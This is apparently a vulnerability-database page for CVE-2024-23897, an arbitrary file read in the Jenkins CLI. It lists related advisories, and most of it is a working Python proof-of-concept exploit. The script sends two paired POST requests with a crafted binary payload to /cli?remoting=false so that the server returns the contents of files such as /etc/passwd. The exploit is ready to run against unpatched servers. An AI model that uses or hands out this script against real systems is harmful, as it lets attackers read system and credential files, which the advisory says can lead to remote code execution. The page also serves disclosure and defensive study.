Lucene search
Jenkins 2.441 / LTS 2.426.3 Arbitrary File Read
🗓️ 29 Jan 2024 00:00:00Reported by binganao, github.comType 
packetstorm🔗 packetstormsecurity.com👁 308 Views
Jenkins 2.441 / LTS 2.426.3 Arbitrary File Read vulnerability in Python exploi
Show more
| Reporter | Title | Published | Views | Family All 85 |
|---|---|---|---|---|
 | BIT-JENKINS-2024-23897 | 6 Mar 202410:53 | – | osv |
| CVE-2024-23897 | 24 Jan 202418:15 | – | osv |
| CGA-7599-VH7R-JGGH | 6 Jun 202412:24 | – | osv |
| CGA-HH8Q-GM3C-2W42 | 6 Jun 202412:26 | – | osv |
| GHSA-6F9G-CXWR-Q5JR Arbitrary file read vulnerability through the Jenkins CLI can lead to RCE | 24 Jan 202418:31 | – | osv |
| RHSA-2024:0776 Red Hat Security Advisory: jenkins and jenkins-2-plugins security update | 30 Sep 202407:10 | – | osv |
| RHSA-2024:0775 Red Hat Security Advisory: jenkins and jenkins-2-plugins security update | 30 Sep 202416:32 | – | osv |
| RHSA-2024:0778 Red Hat Security Advisory: Jenkins and Jenkins-2-plugins security update | 30 Sep 202415:05 | – | osv |
 | Exploit for Path Traversal in Jenkins | 8 May 202402:28 | – | githubexploit |
| Exploit for Path Traversal in Jenkins | 27 Jan 202412:57 | – | githubexploit |
10
`# python poc.py
# [*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]
import threading
import http.client
import time
import uuid
import urllib.parse
import sys
if len(sys.argv) != 3:
print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]')
exit()
data_bytes = b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@' + sys.argv[2].encode() + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05zh_CN\x00\x00\x00\x00\x03'
target = urllib.parse.urlparse(sys.argv[1])
uuid_str = str(uuid.uuid4())
print(f'REQ: {data_bytes}\n')
def req1():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "download"
})
print(f'RESPONSE: {conn.getresponse().read()}')
def req2():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "upload",
"Content-type": "application/octet-stream"
}, body=data_bytes)
t1 = threading.Thread(target=req1)
t2 = threading.Thread(target=req2)
t1.start()
time.sleep(0.1)
t2.start()
t1.join()
t2.join()
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo29 Jan 2024 00:00Current
6.6Medium risk
Vulners AI Score6.6
EPSS0.94466